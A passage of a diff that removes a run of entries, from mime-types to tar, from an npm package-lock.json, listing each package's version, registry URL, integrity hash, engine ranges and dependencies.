"integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.32", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", - "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", - "dependencies": { - "mime-db": "1.49.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.1.3.tgz", - "integrity": "sha512-Mgd2GdMVzY+x3IJ+oHnVM+KG3lA5c8tnabyJKmHSaG2kAGpudxuOf8ToDkhumF7UzME7DecbQE9uOZhNm7PuJg==", - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dependencies": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "bin": { - "mkdirp": "bin/cmd.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha1-h6kGXNs1XTGC2PlM4RGIuCXGijs=", - "dev": true - }, - "node_modules/node-releases": { - "version": "1.1.74", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-1.1.74.tgz", - "integrity": "sha512-caJBVempXZPepZoZAPCWRTNxYQ+xtG/KAi4ozTA5A+nJ7IU+kLQCbqaUjb5Rwy14M9upBWiQ4NutcmW04LJSRw==", - "dev": true - }, - "node_modules/nodemailer": { - "version": "6.9.9", - "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.9.9.tgz", - "integrity": "sha512-dexTll8zqQoVJEZPwQAKzxxtFn0qTnjdQTchoU6Re9BUUGBJiOy3YMn/0ShTW6J5M0dfQ1NeDeRTTl4oIWgQMA==", - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/nunjucks": { - "version": "3.2.4", - "resolved": "https://registry.npmjs.org/nunjucks/-/nunjucks-3.2.4.tgz", - "integrity": "sha512-26XRV6BhkgK0VOxfbU5cQI+ICFUtMLixv1noZn1tGU38kQH5A5nmmbk/O45xdyBhD1esk47nKrY0mvQpZIhRjQ==", - "dependencies": { - "a-sync-waterfall": "^1.0.0", - "asap": "^2.0.3", - "commander": "^5.1.0" - }, - "bin": { - "nunjucks-precompile": "bin/precompile" - }, - "engines": { - "node": ">= 6.9.0" - }, - "peerDependencies": { - "chokidar": "^3.3.0" - }, - "peerDependenciesMeta": { - "chokidar": { - "optional": true - } - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "optional": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/oidc-token-hash": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.1.tgz", - "integrity": "sha512-EvoOtz6FIEBzE+9q253HsLCVRiK/0doEJ2HCvvqMQb3dHZrP3WlJKYtJ55CRTw4jmYomzH4wkPuCj/I3ZvpKxQ==", - "optional": true, - "engines": { - "node": "^10.13.0 || >=12.0.0" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "5.4.0", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.0.tgz", - "integrity": "sha512-hgJa2aQKcM2hn3eyVtN12tEA45ECjTJPXCgUh5YzTzy9qwapCvmDTVPWOcWVL0d34zeQoQ/hbG9lJhl3AYxJlQ==", - "optional": true, - "dependencies": { - "jose": "^4.10.0", - "lru-cache": "^6.0.0", - "object-hash": "^2.0.1", - "oidc-token-hash": "^5.0.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "node_modules/picomatch": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.0.tgz", - "integrity": "sha512-lY1Q/PiJGC2zOv/z391WOTD+Z02bCgsFfvxoXXf6h7kv9o+WmsmzYqrAwY63sNgOxE4xEdq0WyUnXfKeBrSvYw==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.4.1.tgz", - "integrity": "sha512-dt/Z761JUVsrIKaY215o1xQJBGlSmTx/h4cSqXqjHLnU1+Kt+mavVE7UgqJJO5ukx5HjSswHfmXz4LjS2oIJfg==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.4.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "node_modules/psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "engines": { - "node": ">=6" - } - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.20.0", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.20.0.tgz", - "integrity": "sha512-wENBPt4ySzg4ybFQW2TT1zMQucPK95HSh/nq2CFTZVOGut2+pQvSsgtda4d26YrYcr067wjbmzOG8byDPBX63A==", - "dev": true, - "dependencies": { - "is-core-module": "^2.2.0", - "path-parse": "^1.0.6" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.0.tgz", - "integrity": "sha512-6K/gDlqgQscOlg9fSRpWstA8sYe8rbELsSTNpx+3kTrsVCzvSl0zIvRErM7fdl9ERWDsKnrLnwB+Ne89918XOg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/rfc4648": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", - "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" - }, - "node_modules/rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "dependencies": { - "glob": "^7.1.3" - }, - "bin": { - "rimraf": "bin.js" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=", - "dev": true - }, - "node_modules/sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "dependencies": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tar/node_modules/minipass": { - "version": "5.0.0", - "resolved": 